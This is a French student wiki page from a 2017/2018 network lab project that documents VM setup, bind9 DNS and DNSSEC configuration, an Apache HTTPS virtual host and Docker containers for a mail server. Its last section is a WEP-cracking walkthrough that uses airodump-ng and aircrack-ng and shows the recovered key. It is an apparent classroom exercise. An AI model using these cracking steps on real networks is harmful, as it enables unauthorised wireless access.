TP sysres IMA2a5 2017/2018 G3

De Wiki d'activités IMA

Projet de réseau IMA2A5

Création et configuration de la Machine virtuelle


Notre tâche principale de ce projet de promo est de monter un serveur de messagerie

Nous avons tout d'abord créé une machine virtuelle, stockée sur le serveur cordouan. Cette machine est une MV Xen, nommée duvel (en référence au doux breuvage portant le même nom). Nous avons installé quelques paquets qui nous serviront pour la suite, notammant :

  • apache2 comme serveur web
  • docker afin de créer des conteneurs de messagerie
  • bind9 pour monter notre serveur DNS


Ensuite, nous avons configuré le réseau de notre machine virtuelle afin qu'il soit configuré sur son nouveau réseau (celui mis en place par les copains). Sa nouvelle adresse IP est 193.48.57.165 .
Après avoir acheté un nom de domaine sur gandi.net (duvel.space), nous avons monté le serveur DNS via bind9. Nous avons en premier lieu modifier les fichiers :

  • named.conf.local :

    zone "duvel.space" {
    type master;
    file "/etc/bind/webmail.duvel.space";
    // allow-transfer { };
    };

  • named.conf.options :

    dnssec-validation auto;
    auth-nxdomain no; # conform to RFC1035
    listen-on-v6 { any; };

  • webmail.duvel.space :
    $TTL 604800
    @ IN SOA ns.duvel.space. root.duvel.space. (
    3298267243  ; Version
    7200  ; Refresh (2h)
    3600  ; Retry (1h)
    1209600  ; Expire (14j)
    259200 )  ; Minimum TTL (3j)
    IN NS ns.duvel.space.
    IN NS ns6.gandi.net.

    ns IN A 193.48.57.165
    ns6 IN A 217.70.177.40

Configuration DNS sécurisé

    Après avoir ajouté "dnssec-enable yes" dans le fichier "named.conf.options", nous avons modifier le fichier webmail.duvel.space pour la compatibilité avec les mails (ajout des 2 lignes suivantes).
  • IN MX 100 ns.duvel.space.
  • www IN CNAME ns

    La config ssl de apache a aussi été modifier pour avoir un site en https sur le port 443 avec certificat.

    <IfModule mod_ssl.c>
    <VirtualHost *:443>
    ServerAdmin webmaster@localhost

    DocumentRoot /var/www/html

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

    SSLEngine on
    SSLCertificateFile /root/duvel.crt
    SSLCertificateKeyFile /root/duvel.key

    SSLCertificateChainFile /root/GandiStandardSSLCA2.pem
    <FilesMatch "\.(cgi|shtml|phtml|php)$">
    SSLOptions +StdEnvVars
    </FilesMatch>
    <Directory /usr/lib/cgi-bin>
    SSLOptions +StdEnvVars
    </Directory>

    BrowserMatch "MSIE [2-6]" \
    nokeepalive ssl-unclean-shutdown \
    downgrade-1.0 force-response-1.0
    BrowserMatch "MSIE [17-9]" ssl-unclean-shutdown
    </VirtualHost>
    </IfModule>



    Nous avons ensuite créé les 2 clefs asymétriques suivantes:

  • clef asym clef de zone : Kduvel.space.+005+15754
  • clef asym clef d'enregistrement : Kduvel.space.+005+43650


    Tâche spécifique: Création d'un serveur mail

    L'idée est ici de créer un serveur mail sur notre machine virtuelle à partir de postfix, tout en utilisant des conteneurs correspondants à chaque utilisateur.
    Les conteneurs sont créés avec Docker. Pour cela, on récupère une image avec la commande "docker pull debian" et on le créé sur notre machine avec "docker run -i -t debian /bin/bash"


    Crack de la clef WEP

    • On commence par chercher le point d'accès:
      airodump-ng --encrypt wep wlan0mon
    • Ensuite on écoute les trames wifi:
      airodump-ng -w out -c 4 --essid ***** wlan0mon
    • On lance ensuite la commande suivante dans un autre terminal pour trouver la clef, la recherche dure environ 5 minutes. Ce temps est dû au fait que l'on procède par tests (force brute)
      aircrack-ng out-01.cap
      KEY FOUND! [ 63:32:34:67:4A:3A:51:34:76:25:43:77:3F ] (ASCII: c24gJ:Q4v%Cw? )